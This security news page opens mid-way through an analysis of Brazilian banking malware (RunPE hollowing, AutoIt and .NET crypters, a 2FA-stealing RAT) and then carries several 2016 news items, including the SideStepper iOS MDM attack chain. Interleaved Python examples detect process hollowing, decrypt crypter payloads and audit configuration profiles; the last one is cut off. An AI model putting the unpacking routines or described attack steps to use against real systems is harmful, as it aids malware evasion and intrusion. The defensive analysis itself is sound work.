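    print(f"{op} key=0x{key:02x} crib={crib!r} -> {pt!r}")
```

The crib-first design matters for the sub variant: subtracting a key that is off by one to five from the real one still yields all-printable ASCII for a URL, so a printable-ratio score would pick the wrong key.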
In order to avoid detection by a network firewall, the downloaded file is encrypted using its own encryption function.
Encrypted file
Decrypted file
The encryption function is also hidden using the same method as the download function; after decrypting the code we find an XOR-based encryption combined with a shift-right operation on the XOR key.
After decrypting the file, the malware does not execute it using the normal methods usually found in malicious code. To hide the process on the machine it uses a trick known as RunPE: it launches a clean process (such as iexplore.exe or explorer.exe) in a suspended state, replaces its memory content with the malicious code, and then executes it.
Code launching a clean process in a suspended state
After creating the process in a suspended state the code will write the new code to the memory space, set the new EIP for execution and then resume the thread.
Writing malicious code and resuming the thread
Internet explorer process hosting the malicious file
Since the malicious code is running in the memory space allocated to Internet Explorer, using tools like Process Explorer to verify the publisher signature does not work, because they check the signature of the process image on disk.
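Because the hollowed process looks legitimate on disk, detection has to key off the call sequence rather than the image: a child created with CREATE_SUSPENDED, written to and given a new thread context (or unmapped) by its parent, and only then resumed. The detector below is an added example for this page, not from the article; it consumes a constructed JSON-lines API-monitor log, and the field names are assumptions about that telemetry (CREATE_SUSPENDED = 0x4 is the documented Win32 flag value).

```python
# Added example (not from the article): detect the RunPE / process-hollowing
# call sequence in API-monitor style telemetry. Log format is constructed.
import json

CREATE_SUSPENDED = 0x00000004  # documented Win32 process-creation flag

# Constructed JSON-lines log: a hollowing sequence (pid 4120 -> 5004) and a
# benign suspended start that is resumed without any memory writes (3300 -> 3388).
SAMPLE_LOG = r"""
{"ts": 1, "pid": 4120, "api": "CreateProcessW", "image": "C:\\Program Files\\Internet Explorer\\iexplore.exe", "flags": 4, "child_pid": 5004}
{"ts": 2, "pid": 3300, "api": "CreateProcessW", "image": "C:\\Windows\\System32\\notepad.exe", "flags": 4, "child_pid": 3388}
{"ts": 3, "pid": 4120, "api": "NtUnmapViewOfSection", "target_pid": 5004}
{"ts": 4, "pid": 4120, "api": "VirtualAllocEx", "target_pid": 5004, "size": 204800}
{"ts": 5, "pid": 4120, "api": "WriteProcessMemory", "target_pid": 5004, "size": 204800}
{"ts": 6, "pid": 3300, "api": "ResumeThread", "target_pid": 3388}
{"ts": 7, "pid": 4120, "api": "SetThreadContext", "target_pid": 5004}
{"ts": 8, "pid": 4120, "api": "ResumeThread", "target_pid": 5004}
{"ts": 9, "pid": 9999, "api": "WriteProcessMemory", "target_pid": 1234, "size": 16}
"""

WRITE_APIS = {"WriteProcessMemory", "NtWriteVirtualMemory"}
CONTEXT_APIS = {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}
UNMAP_APIS = {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}


def detect_hollowing(log_text):
    """Return [(parent_pid, child_pid, image)] for children that were created
    suspended, had memory written by the parent, and had their thread context
    replaced or their image unmapped before ResumeThread."""
    pending = {}   # child_pid -> state collected while it is still suspended
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        api = ev["api"]
        if api.startswith("CreateProcess") and ev.get("flags", 0) & CREATE_SUSPENDED:
            pending[ev["child_pid"]] = {"parent": ev["pid"], "image": ev["image"],
                                        "wrote": False, "ctx": False, "unmapped": False}
            continue
        state = pending.get(ev.get("target_pid"))
        if state is None or ev["pid"] != state["parent"]:
            continue   # not a tracked suspended child, or touched by another process
        if api in WRITE_APIS:
            state["wrote"] = True
        elif api in CONTEXT_APIS:
            state["ctx"] = True
        elif api in UNMAP_APIS:
            state["unmapped"] = True
        elif api == "ResumeThread":
            if state["wrote"] and (state["ctx"] or state["unmapped"]):
                alerts.append((state["parent"], ev["target_pid"], state["image"]))
            del pending[ev["target_pid"]]
    return alerts


if __name__ == "__main__":
    for parent, child, image in detect_hollowing(SAMPLE_LOG):
        print(f"possible RunPE: pid {parent} hollowed pid {child} ({image})")
```

Requiring a memory write plus a context change or unmap before the resume is what keeps debuggers and installers, which also start children suspended, out of the alert list.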
It was clear that they had moved on completely from using beginner’s code to a much more professional development and we realized it was time to update the analysis process for Brazilian malware. We are sure most of this evolution happened due to contact and the exchange of knowledge with other malware scenes, mostly those in Eastern Europe, which we described in this article.
AutoIt Crypto
AutoIt is now often used as a downloader and crypto for the final payload in order to bypass detection. After being compiled, the AutoIt script is encrypted and embedded in the generated binary, which makes it necessary to extract the original script before analyzing its code.
Looking for a better way to hide the final payload, the Brazilian cybercriminals have developed a new crypto using AutoIt language where the decrypted payload is executed by using a RunPE technique.
AutoIt Crypto execution flow
The crypto uses two different methods to store the encrypted file: the first is the FileInstall function that already exists in AutoIt, and the other is embedding the file at the end of the binary.
When using the second method the crypto writes a marker key that indicates where the encrypted payload content starts, so it can later find the content to decrypt. In the sample below, the key used is a short version of “Sei que ganharei 20K”, which means “I know that I will win R$ 20,000”.
Key used to mark where the encrypted payload starts
AutoIt Crypto main code
After reading the encrypted payload it decrypts the content using the decryption key “VENCIVINICI” and then executes the malicious payload using RunPE.
The decryption function is not written in AutoIt – it is written in C. After being compiled, its bytes are included in the script as a string, then mapped into memory and executed using the CallWindowProc API.
Decryption function implementation
We found the following algorithms being implemented as the encryption/compression method for this crypto:
RC4
XXTEA
AES
LZMA
ZLIB
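To see how an analyst recovers the embedded payload without running the stub, the block below carves the bytes that follow the marker and decrypts them. It is an added example for this page, not the crypto's own code nor Kaspersky's: the marker bytes are assumed (the article says only that a short version of the phrase is used), the decryption key is the one the article names, and treating this sample as RC4 is an assumption since the article lists RC4 among several algorithms the crypto has used. The stub and payload bytes are constructed.

```python
# Added example (not from the article): carve the payload appended after the
# marker and decrypt it with RC4. Marker bytes, stub and payload are constructed;
# that this sample used RC4 (one of the algorithms the article lists) is assumed.

# Assumption: the article says a short version of this phrase marks the payload.
MARKER = b"Sei que ganharei 20K"
KEY = b"VENCIVINICI"


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def carve_payload(blob, marker=MARKER):
    """Return the bytes that follow the first occurrence of the marker, or None."""
    idx = blob.find(marker)
    if idx < 0:
        return None
    return blob[idx + len(marker):]


def extract_and_decrypt(blob, key=KEY, marker=MARKER):
    enc = carve_payload(blob, marker)
    return None if enc is None else rc4(key, enc)


def looks_like_pe(data):
    """Cheap sanity check that decryption produced an executable (MZ header)."""
    return data is not None and data[:2] == b"MZ"


# Constructed stand-in for a compiled AutoIt stub with an appended payload.
FAKE_PAYLOAD = b"MZ" + b"\x90" * 30 + b"constructed-fake-payload"
SAMPLE_BINARY = (b"MZ" + b"\x00" * 64 + b"compiled-AutoIt-stub-bytes"
                 + MARKER + rc4(KEY, FAKE_PAYLOAD))

if __name__ == "__main__":
    payload = extract_and_decrypt(SAMPLE_BINARY)
    print("payload is PE:", looks_like_pe(payload), "length:", len(payload))
```

If the MZ check fails on a real sample, the next candidates are the other algorithms the article lists; the carving step stays the same, only the decrypt routine changes.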
The use of AutoIt for malware development is not something new, but in the middle of 2014 we saw a wave of attacks using AutoIt in Brazil, as we can see on the graph below.
Trojan.Win32.Autoit: number of users attacked in Brazil
MSIL Database
Another type of malware that emerged recently is malware developed in .NET instead of Visual Basic 6.0 and Delphi, following a trend we saw worldwide. It is not hard to find a downloader written in .NET. However, some samples of Trojan-Banker.MSIL.Lanima grabbed our attention because they did not use the functions commonly used to download a payload.
Download function
As we can see in the picture above, this sample does not use any download function: the binary content is hosted in a SQL Server database, and the sample simply issues a SQL query to retrieve the content and save it to disk.
The strings are encoded with base64 and encrypted with the Triple DES algorithm in order to hide the text related to the main actions of the malware.
Decrypt function
This family of malware is very prevalent in Brazil and China.
MSIL Crypto
Following the same method used by AutoIt Crypto, the bad guys developed another crypto, this time in .NET. The process to extract the real executable is almost the same as for AutoIt Crypto, but there is an intermediate module responsible for extracting the final payload.
The main module is .NET code whose main function is to extract and load the embedded DLL.
.NET Crypto execution flow
Crypto main function
As we can see, the function above splits the binary content using the separator string “cdpapxalZZZsssAAA” and uses the second block, which contains the encrypted code of the Loader DLL.
Loader DLL encrypted content
Then it is time to decrypt it by calling the function named “fantasma” (“ghost” in English). The official name used for this crypto in the forums is PolyRevDecrypt; it is basically an XOR operation between the encrypted byte, the last byte of the encrypted buffer and one byte of the password provided to the function.
Decryption function
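Putting the separator split and the decryption together, as an added example for this page (not the crypto's code nor Kaspersky's): the article says PolyRevDecrypt XORs each encrypted byte with the last byte of the buffer and one byte of the password, but not how the password is indexed or whether the trailing byte is itself part of the message. This implementation therefore assumes a cyclic password index and treats the final byte as a stored key byte that is not part of the output. The blob, password and payloads are constructed, and using block index 2 for the final payload is an assumption about the loader stage.

```python
# Added example (not from the article): split a .NET crypto blob on its
# separator and decrypt a block with an assumed form of PolyRevDecrypt.
SEPARATOR = b"cdpapxalZZZsssAAA"   # separator string named in the article


def poly_rev_decrypt(enc, password):
    """Assumed form of PolyRevDecrypt: every byte except the trailing key byte is
    XORed with that trailing byte and with a cyclically indexed password byte."""
    if len(enc) < 2:
        return b""
    last = enc[-1]
    return bytes(b ^ last ^ password[i % len(password)]
                 for i, b in enumerate(enc[:-1]))


def poly_rev_encrypt(plain, password, last_byte):
    """Inverse of the routine above; used only to build the constructed sample."""
    body = bytes(p ^ last_byte ^ password[i % len(password)]
                 for i, p in enumerate(plain))
    return body + bytes([last_byte])


def split_sections(blob, sep=SEPARATOR):
    """Split the module's content on the separator string."""
    return blob.split(sep)


def extract_block(blob, password, index, sep=SEPARATOR):
    """Decrypt block `index` of the split content. Index 1 is the Loader DLL
    (as the article states); index 2 for the final payload is an assumption."""
    parts = split_sections(blob, sep)
    if len(parts) <= index:
        raise ValueError(f"block {index} not present (separator count too low)")
    return poly_rev_decrypt(parts[index], password)


# Constructed sample: main stub, encrypted loader DLL, encrypted final payload.
PASSWORD = b"constructed-password"
LOADER_PLAIN = b"MZ" + b"loader-dll-bytes-constructed"
FINAL_PLAIN = b"MZ" + b"final-banker-payload-constructed"
SAMPLE_BLOB = (b"main-stub-bytes" + SEPARATOR
               + poly_rev_encrypt(LOADER_PLAIN, PASSWORD, 0x5A) + SEPARATOR
               + poly_rev_encrypt(FINAL_PLAIN, PASSWORD, 0xA7))

if __name__ == "__main__":
    print("loader:", extract_block(SAMPLE_BLOB, PASSWORD, 1))
    print("final :", extract_block(SAMPLE_BLOB, PASSWORD, 2))
```

Because the trailing byte is read from the ciphertext itself, every block can carry its own value without changing the password, which is the property that makes the scheme cheap to vary between builds.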
After being decrypted, the code will be loaded and executed by the function “docinho” (or “candy” in English).
Function to load and execute the DLL
The code of the library is almost the same as the main executable except that now it will use the second block of the split content.
Loader DLL main function
RAT
In a bid to reduce the losses related to cyber attacks, banks implemented two-factor authentication using hardware tokens and SMS tokens for online banking transactions, in addition to solutions already in place such as machine identification. To get around this, the cybercriminals created a remote administration tool developed specifically to request the information required to process internet banking transactions.
RAT execution flow
The browser watcher will monitor the user browser and see if any of the target banks are accessed; if they are, it will decompress and execute the RAT Client and notify the C&C about the new infection.
Internet banking access monitoring
The strings used by this malware are encrypted using their own encryption routine. After decrypting them we are able to identify the targets as well as the important parts of the code.
Decrypted strings
For this type of infection it is common for the bad guys to create a way to manage the attacks. Here we can see the number of computers infected on a single day; note that this number counts users who accessed internet banking while the malware was running on their computer.
C&C panel showing the list of infected users
The RAT Client will connect to the server to alert the attacker that a new victim is accessing the internet banking system. It is then possible to execute the attack in real time.
RAT Server showing a new victim is connected
At this stage the attacker just needs to wait for the user to login and then proceed with the attack. When the user is already logged in, the attacker can see the user screen, lock it and control the execution as well as ask for specific information that will help him to steal the account, like:
Token
Access card code
Date of birth
Account password
Internet banking password
Electronic signature
To prevent the user from noticing that the computer is being remotely controlled, this RAT has a function that simulates an update of the bank security plugin, showing a progress bar and disabling all user interaction. Meanwhile, the attacker can perform the banking operations using the active browser session, because the overlay screen is not shown to the attacker.
Lock screen simulating an update
If some information is requested to confirm the transaction, e.g. SMS token, the attacker can ask the victim who will think the information is necessary in order to proceed with the update process.
Screen asking for token code
As soon as the user provides the information, the attacker can enter it on the internet banking screen, bypassing the 2FA used in the transaction.
Information received from the victim
Ransomware
Brazilian cybercriminals not only work with banking malware – they are also exploring other types of attacks involving ransomware. Some years ago, we found TorLocker which contains details inside the malware code suggesting that the developer is from Brazil.
Code containing some strings suggesting the author is from Brazil
As we can see in the image above, we found the sentence highlighted in blue: “Filho de Umbanda não cai!” (“Umbanda’s son never falls down”). Umbanda is an unorthodox religion in Brazil. The name marked in red is the nickname of the author and it also uses the extension .d74 for the encrypted files. This user is very active on underground forums looking for malicious services in Brazil.
We also found other references, such as the use of a Brazilian service to obtain the victim’s IP address when reporting an infection.
Request to a Brazilian service to obtain the victim IP
Some months ago, we found another ransomware program based on the Hidden Tear source code that was modified to target Brazilian users, differing from the initial program that was found targeting English- and Japanese-speaking users.
Victim’s machine showing messages in Portuguese, asking to pay in order to receive the files
Why they evolve
We have sufficient evidence that Brazilian criminals are cooperating with the Eastern European gangs involved with ZeuS, SpyEye and other malware created in the region. This collaboration directly affects the quality and threat level of local Brazilian malware, as its authors are adding new techniques to their creations and getting inspiration to copy some of the features used in the malware originating from Eastern Europe. Brazilian cybercriminals are not only developing the quality of their code but also using the cybercrime infrastructure from abroad.
We saw the first sign of this ‘partnership’ in the development of malware using malicious PAC scripts. This technique was heavily exploited by Brazilian malware starting in 2011 and was later adopted by the Russian banking Trojan Capper. The cooperation continued as Brazilian criminals started to use the infrastructure of banking Trojans from Eastern Europe – Trojan-Downloader.Win32.Crishi was the first to use DGA domains hosted at bulletproof companies from Ukraine. The Boleto malware also adopted massive usage of fast-flux domains, aiming to avoid the takedown of C2s – we saw that with the “bagaça” (bagasse in Portuguese) domains, registered using anonymous services, which hosted crimeware and Boleto material and resolved to different IPs for every request.
The “bagaça” domains: fast flux and bulletproof from Eastern Europe
Other strong signs of their cooperation are the constant presence of Brazilian cybercriminals on Russian or Eastern European underground forums. It’s not unusual to find Brazilian criminals on Russian underground forums looking for samples, buying new crimeware and ATM/PoS malware, or negotiating and offering their services. The results of this cooperation can be seen in the development of new techniques adopted in Brazilian malware.
The Brazilian malicious author of TorLocker negotiating in a Russian underground forum
These facts show how Brazilian cybercriminals are adopting new techniques as a result of collaboration with their European counterparts. We believe this is only the tip of the iceberg, as this kind of exchange tends to increase over the years as Brazilian crime develops and looks for new ways to attack businesses and regular people.
Conclusion
Cybercrime in Brazil has changed drastically in the last few years, as it shifted from simple keyloggers built from public source code to tailored remote administration tools that can run a complete attack by using the victim machine.
Malware that used to show a phishing screen as soon as it was executed is now completely reactive and waits for a valid session in order to start the job.
That means that the criminals are investing much more money and time in order to develop their malicious code, enhancing anti-debugging techniques and then running the malware undetected for much longer.
As we know, they are in touch with cybercriminals from Eastern Europe, mainly Russians, with whom they exchange information, malware source code and services that will be used in Brazilian attacks. We can see that many of the attacks used in Brazil were first seen in Russian malware, and likewise Brazilian techniques later being used in Russian attacks.
Based on that, we can expect to find Brazilian malware with enhanced code obfuscation, anti-debugging tricks, encryption algorithms and secure communications, making our work much harder than it is now.
Security experts warn of a data-stealing virus. It does not need the internet to spread
1.4.2016 Viruses
A new malicious virus that steals user data has been uncovered by security experts at the antivirus company Eset. The uninvited guest has been nicknamed USB Thief because it spreads mainly via flash drives and external hard disks. It can therefore infect even machines that are not connected to the internet. The attacker simply slips them an infected medium.
The new uninvited guest most often spreads via USB flash drives and external disks.
For its “dirty” work USB Thief needs only a few free megabytes on a removable medium that is connected to the computer through a USB port. There it lies in wait until it can attack a computer.
It thus tries to stay hidden for as long as possible to minimise the risk of discovery. Interestingly, it does not run automatically when the medium is connected to the computer, as is usually the case with similar malicious code.
Together with harmless programs, it lets the USB Thief virus into the computer.
Instead, it attaches itself to so-called portable applications, which are often stored precisely on flash drives and external hard disks. These are essentially programs that do not need to be installed; they run directly from the USB media.
Users typically use them on computers where they do not have permission to install applications. Because portable applications do not need to be installed, people can easily bypass administrators’ restrictions, typically on office computers. But together with the harmless programs they let the USB Thief virus into the computer.
Antivirus software is reportedly helpless
The virus then automatically starts stealing data from the connected PC and stores it in encrypted form on the external disk. Given how carefully the uninvited guest operates, most antivirus programs have trouble identifying it. Detecting it is simply not easy at all.
To get at the data, the attacker must get the flash drive or external disk back. USB Thief is therefore most often spread by cyber pirates who slip an infected medium to their victims. Users should thus be wary of using USB storage of dubious origin. That significantly reduces the risk that the new virus will rob them of their data.
It is probably only a matter of time before a more sophisticated variant of this pest starts spreading, one that also spreads via USB media but is able to send the collected data back to the attacker over the internet as well. Then the attacker will no longer need to get the medium back, but will simply wait for the virus to serve up user data on a silver platter, remotely.
Hacker Hijacks a Police Drone from 2 Km Away with $40 Kit
1.4.2016
A researcher has demonstrated how easy it is to steal high-end drones, commonly deployed by government agencies and police forces, from 2 kilometres away with the help of less than $40 worth of hardware.
The attack was developed by IBM security researcher Nils Rodday, who recently presented his findings at Black Hat Asia 2016.
Hacking the $28,463 Drone with Less than $40 of Hardware
Rodday explained how security vulnerabilities in a drone’s radio connection could allow an attacker with some basic knowledge of radio communications to hijack the US$28,463 quadcopter with less than $40 of hardware.
Rodday discovered (PPT) two security flaws in the tested drone that gave him the ability to hack the device in seconds.
First, the connection between drone's controller module, known as telemetry box, and a user’s tablet uses extremely vulnerable 'WEP' (Wired-Equivalent Privacy) encryption – a protocol long known to be 'crackable in seconds.'
This flaw could be exploited by any attacker within Wi-Fi range of 100 meters to break into that connection and send a malicious command that disconnects the drone’s owner from the network.
Second, the onboard chips used for communication between the telemetry module and the drone use an even less secure radio protocol.
Hijacking Drones from 2 Kms Away
The module and drone communicate using an ‘Xbee’ chip, made by the Minnesota-based chipmaker Digi International and commonly used in unmanned aerial vehicles (UAVs) everywhere.
According to Rodday, Xbee chips do have built-in encryption capabilities, but to avoid latency between the drone and the user’s commands, encryption is not used.
This issue leaves the drones open to ‘Man-in-the-Middle’ (MitM) attacks, allowing an attacker to intercept everything happening on the UAV’s network connection and inject commands between the drone and the telemetry box from up to 2 kilometres away.
Furthermore, Rodday also warned that any sophisticated hacker with the ability to reverse engineer the drone's software would be able to send navigational controls, block all commands from the real operator, or even crash it to the ground.
Rodday’s research proves that there are critical issues with what is likely the most expensive drone yet, one that is used for more serious purposes than high-altitude selfies, and this needs to be taken seriously.
The dangerous interaction between Russian and Brazilian cyber criminal underground
1.4.2016 Hacking
Kaspersky has analyzed the interaction between the Russian and Brazilian criminal underground communities revealing a dangerous interaction.
In the past weeks, we have analyzed the evolution of cyber criminal communities worldwide, focusing on illicit activities in the Deep Web. To simplify the approach we considered the principal cyber criminal communities (Russia, Brazil, North America, Japan, China, Germany) as separate entities; in reality these ecosystems interact with each other, in a way that Kaspersky experts have now analyzed.
Experts from Kaspersky Lab have analyzed the interaction between the Russian and Brazilian criminal communities, a dangerous interaction that is leading to a rapid evolution of hacking tools.
The experts at Kaspersky Lab demonstrated that Brazilian and Russian-speaking criminals cooperate intensively: Brazilian criminals buy malware samples from Russian peers who operate the principal underground forums. Typically they pay for exploit kits, ATM or PoS malware and also hacking services.
The first example of collaboration dates back to 2011, when Brazilian cyber criminals were actively abusing malicious PAC scripts to redirect victims to phishing pages. A few months later, the cyber criminals behind the Russian banking Trojan Capper adopted the same technique.
“We saw the first sign of this ‘partnership’ in the development of malware using malicious PAC scripts. This technique was heavily exploited by Brazilian malware starting in 2011 and was later adopted by Russian banking Trojan Capper. ” states the analysis published by Kaspersky.
The experts highlight that cooperation runs both ways, helping to speed up the growth of hacking capabilities of both communities and also malware evolution.
“As we know, they are in touch with cybercriminals from Eastern Europe, mainly Russians, where they exchange information, malware source code and services that will be used in Brazilian attacks. We can see that many of the attacks used in Brazil were first seen in Russian malware as well as Brazilian techniques later being used in Russian attacks.” continues Kaspersky.
The researchers collected evidence of the profitable collaboration. In one discussion thread on an underground forum frequented by Russian hackers, a user behind the moniker “Doisti74” expressed his interest in buying compromised machines located in Brazil. The same user is present in the Brazilian underground scene, and researchers believe he could be interested in launching a malware-based campaign in Brazil.
Brazilian crooks are looking at ransomware with increasing interest. Some years ago experts at Kaspersky discovered the threat TorLocker, developed by Brazilian malware developers. Some months ago, Kaspersky spotted another ransomware based on the Hidden Tear source code that was adapted to target Brazilian users.
Crooks belonging to the two criminal underground communities also share malicious infrastructure; this was the case for a number of Boleto malware campaigns observed in Brazil that relied on the same infrastructure used months before by the operators behind the Russian banking Trojan family Crishi.
The researchers have illustrated in detail the numerous pieces of evidence they collected on the collaboration between Russian and Brazilian hackers, and highlighted that Brazilian banking malware has evolved rapidly in recent years thanks to this interaction.
“Just a few years ago, Brazilian banking malware was very basic and easy to detect,” said Thiago Marques, security researcher at Kaspersky Lab.
“With time, however, the malware authors have adopted multiple techniques to avoid detection, including code obfuscation, root and bootkit functions and so on, making their malware much more sophisticated and harder to combat.
“This is thanks to malicious technologies developed by Russian-speaking criminals. And this cooperation works both ways.”
I have no doubt: cybercrime has no boundaries, and this kind of interaction will reinforce the principal criminal underground communities.
Did hackers hack the election to make Peña Nieto President?
1.4.2016 Hacking
A Colombian hacker claims he helped candidate Enrique Peña Nieto win the Mexican presidential election in 2012.
Until now we have seen something like this only in TV series, but reality may outdo fiction: a Colombian hacker claims he helped Enrique Peña Nieto win the Mexican presidential election.
The hacker, named Andrés Sepúlveda, revealed that he worked in a team with peers to install malware to monitor opponents during the 2012 campaign, as part of a hacking campaign codenamed ‘black propaganda.’
The hackers helped Enrique Peña Nieto win Mexico’s 2012 presidential election, and they manipulated elections in nine countries across Latin America. They installed malware with the intent of spying on target machines and stealing data, and they also used a botnet to run PSYOPs on social media in an attempt to influence the voters’ final decision.
The hacker, who is currently serving a 10-year prison sentence for hacking crimes related to Colombia’s 2014 presidential election, gave an interview to Bloomberg explaining that he was hired by the Miami-based political consultant Juan José Rendón.
“My job was to do actions of dirty war and psychological operations, black propaganda, rumors—the whole dark side of politics that nobody knows exists but everyone can see” the man told Bloomberg.
Sepúlveda added that his primary motivation was political: he hacked in opposition to what he called “dictatorships and socialist governments.”
The political consultant Juan José Rendón denied having hired Sepúlveda for illegal activities and confirmed that he paid him in 2005 for the development of a web site.
“He is delusional,” Rendón said in a phone call. “All the things he describes are exactly like the TV show Mr Robot.”
“Can you really change the will of the people through social networks? Maybe in Ukraine or Syria where there are no alternatives. But here (in the Americas) where there is TV, a free press and door to door campaigns, it is not so influential,” he added.
Sepúlveda confirmed that he had a $600,000 budget to undermine the presidential campaigns of Nieto’s opponents, Josefina Vázquez Mota and Andrés Manuel López Obrador.
The hacker team compromised computers at the headquarters of the two candidates in order to monitor communications and exfiltrate sensitive data, including speech drafts and campaign schedules.
They also ran a PSYOP on the main social networks, using a multitude of fake Twitter accounts to fuel public debate on Peña Nieto’s political plan and discredit his rivals; all these accounts were carefully managed so as to appear legitimate.
“He wrote a software program, now called Social Media Predator, to manage and direct a virtual army of fake Twitter accounts. The software let him quickly change names, profile pictures, and biographies to fit any need. Eventually, he discovered, he could manipulate the public debate as easily as moving pieces on a chessboard—or, as he puts it, “When I realized that people believe what the Internet says more than reality, I discovered that I had the power to make people believe almost anything.”” reported Bloomberg.
Sepúlveda confirmed that he used a strategy similar to ‘black propaganda’ to influence voters in other elections in several countries, including Venezuela, Nicaragua, Panama, Honduras, El Salvador, Colombia, Costa Rica and Guatemala.
Unfortunately, the man destroyed most of the evidence of his support for political candidates in the various presidential campaigns.
What is Peña Nieto’s position?
The Office of the President issued the following statement:
“We reject any relationship between the 2012 presidential campaign team and Andrés Sepúlveda or that there was a contract with the consultant J.J. Rendón.”
Just One? No, FBI to Unlock More iPhones with its Secret Technique
1.4.2016 Apple
The Federal Bureau of Investigation (FBI) worked with Israeli mobile forensic firm Cellebrite to unlock the iPhone used in the San Bernardino shooting last year, multiple sources familiar with the matter confirmed.
The United States Department of Justice (DoJ) said on Tuesday that the FBI successfully unlocked the iPhone and accessed its data with the help of an undisclosed alternative method offered by a third party, and that it no longer needs Apple's assistance.
Apple was engaged in a legal encryption battle with the DoJ for a month over a court order that would have forced the company to write new software to disable passcode protection on Farook's iPhone 5C so that investigators could access the data on it.
Apple refused to comply with the order, saying the FBI wants the company to create the "software equivalent of cancer" that would likely threaten the privacy and data security of millions of its iPhone users.
FBI to Unlock iPhone in Several Pending Cases
Although the legal battle between the FBI and Apple is over, the 'encryption vs. national security' drama is still ongoing.
Apple to FBI: Reveal Your Secret Technique
Apple asked the FBI to share the exploit that bypassed the iPhone's security protections, but the agency, which had already been frustrated in its attempts to convince Apple to help it access data on just one iPhone, might prefer to keep its technique secret.
Now that the FBI itself owns such "cancerous" software, the agency would most likely use it to resolve several pending court cases in which the Feds were seeking Apple's assistance to access information on a locked iPhone.
Yes, the FBI is keeping its technique secret… but only from Apple and not from other law enforcement agencies seeking details on the method to access locked iPhones involved in criminal cases.
Currently, there are two separate court cases, one in Arkansas and the other in Brooklyn, seeking help from the FBI.
Case 1: Reportedly, the FBI agreed to help police in Arkansas in a homicide case by unlocking an iPhone and an iPod belonging to two teens accused of killing a couple.
Case 2: In the Brooklyn case, an iPhone 5S running iOS 7 was seized in the course of a drug investigation. The DoJ will disclose by April 11 whether it will "modify" its request for Apple's assistance in this case or unlock the device itself.
Apple's Biggest Problem: How FBI hacked its iPhone
It's still an open question, but since the agency so desperately wanted an iPhone backdoor, it seems unlikely to share it with Apple now that it has one.
Apple is now in the uncomfortable position of knowing that a critical vulnerability exists in its operating system, but not knowing what it is.
The situation is serious for Apple because the company knows the FBI has no legal obligation to disclose how it broke the iPhone's security.
Moreover, the government could argue that the technique is bound by a non-disclosure agreement with the third party that unlocked the iPhone.
And it's not just Apple that has been approached several times to help the Feds unlock iPhones: Google has also been asked at least nine times to help federal agencies break into locked Android smartphones, citing the All Writs Act.
SideStepper method allows infecting iOS devices via MDM solutions
1.4.2016 Apple
SideStepper is a method to install malicious apps on iOS devices by abusing the mobile device management (MDM) solutions.
Security researchers from Check Point have devised a method to install malicious code on iOS devices by abusing the mobile device management (MDM) solutions used by many enterprises.
The technique relies on a weakness the experts dubbed SideStepper, which Apple considers normal behavior.
“SideStepper is a vulnerability that allows an attacker to circumvent security enhancements in iOS 9 meant to protect users from installing malicious enterprise apps. These enhancements require the user to take several steps in device settings to trust an enterprise developer certificate, making it harder to install a malicious app accidentally.” states the blog post published by Check Point.
Apple allows enterprises to distribute internally used apps through the Developer Enterprise Program instead of passing through the App Store. To install the apps, enterprises need to use certificates signed by Apple.
The program allows organizations to install internal apps on employee devices using enterprise certificates signed by Apple.
However, hackers have abused enterprise certificates on several occasions, so Apple introduced new security enhancements in iOS 9.
“These enhancements require the user to take several steps in device settings to trust an enterprise developer certificate, making it harder to install a malicious app accidentally.” states Check Point.
SideStepper technique
MDM solutions are used by enterprises to easily manage the mobile devices used by employees. MDM allows managing any aspect of the mobile devices, including installing apps, deploying security policies, and remotely wiping phones.
Experts at Check Point highlighted that threat actors can launch a man-in-the-middle (MitM) attack against the MDM solution to have malicious enterprise apps installed over the air; this is possible because Apple allows apps installed through MDM to bypass the security measures described above.
Malicious MDM-distributed apps can be abused by using the following process:
Install a malicious iOS configuration profile. This is a native way to distribute a set of configuration settings like networking, security settings, root CAs, and more. A threat actor can craft a configuration profile that will install a root CA and route traffic through a VPN or a proxy to a malicious server, and then initiate a MitM attack. This configuration could be deployed using a phishing attack.
Set up a remote enterprise app server to serve the malicious app.
Wait for a command to be sent to an iOS device by an MDM: then, using a MitM attack, intercept and replace the command with a request to install a malicious app. The iOS device will fetch the app from the remote enterprise app server and install it.
Execute commands using the malicious enterprise app which, because of the method used to install it, does not require explicit user trust. This means that users will not be able to distinguish between a legitimate enterprise app, an App Store app, or a bogus app installed by a threat actor.
Basically, the attackers could intercept the command sent by the MDM to the devices and replace it with a request to install a malicious app. The operation doesn’t need user interaction, which makes the attack hard to discover.
The SideStepper technique could be used to infect Apple devices and control them with malicious code.
Check Point suggests that enterprises carefully assess the risk of malicious applications on mobile devices.
Experts from Check Point will present the SideStepper method at the Black Hat Asia conference today.
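The chain above starts with a configuration profile that installs a root CA and redirects traffic. A defender-side audit for that first step, written for this page and not part of Check Point's research: it parses an unsigned .mobileconfig with plistlib and flags the payload types that together let the profile author intercept MDM traffic. The PayloadType identifiers are Apple's documented ones; the sample profile and its addresses are constructed.

```python
import plistlib

# PayloadType identifiers from Apple's Configuration Profile Reference. A root CA
# combined with a VPN or global HTTP proxy is what lets a profile author place
# themselves between the device and its MDM server.
RISKY_PAYLOAD_TYPES = {
    "com.apple.security.root": "installs a root CA (enables TLS interception)",
    "com.apple.vpn.managed": "configures a VPN (can route all traffic to a remote host)",
    "com.apple.proxy.http.global": "sets a global HTTP proxy (redirects web and MDM traffic)",
}
TRAFFIC_REDIRECTORS = {"com.apple.vpn.managed", "com.apple.proxy.http.global"}

# Constructed sample profile (not a real one): presented as a Wi-Fi profile but
# also carrying a root CA and a global proxy pointing at a documentation address.
SAMPLE_PROFILE = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>PayloadType</key><string>Configuration</string>
  <key>PayloadIdentifier</key><string>example.constructed.profile</string>
  <key>PayloadDisplayName</key><string>Corporate Wi-Fi Settings</string>
  <key>PayloadContent</key>
  <array>
    <dict>
      <key>PayloadType</key><string>com.apple.wifi.managed</string>
      <key>PayloadIdentifier</key><string>example.constructed.wifi</string>
      <key>SSID_STR</key><string>CorpNet</string>
    </dict>
    <dict>
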